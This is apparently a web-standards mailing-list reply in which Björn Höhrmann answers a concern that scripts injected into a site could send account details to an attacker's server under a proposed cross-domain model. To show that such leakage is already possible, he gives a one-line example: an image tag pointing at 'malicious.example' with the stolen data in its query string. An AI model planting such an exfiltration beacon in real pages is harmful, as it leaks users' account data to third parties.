* Ian Davis wrote: >My concern with this security model is that it doesn't prevent malicious >scripts injected into a site from calling back to a host. For example I >can set up a server to allow requests from all then contrive to inject a >script via a broken forum that sends account details back to my server. >The current cross-domain scripting rules prevent this.
If you are able to inject some script you can send any and all data you are able to obtain to a third party, in a simple case you could just append the data to a new <img src="http://malicious.example/?data=...">. So I don't think I understand your concern, could you elaborate? -- Björn Höhrmann · mailto:[EMAIL PROTECTED] · http://bjoern.hoehrmann.de Weinh. Str. 22 · Telefon: +49(0)621/4309674 · http://www.bjoernsworld.de 68309 Mannheim · PGP Pub. KeyID: 0xA4357E78 · http://www.websitedev.de/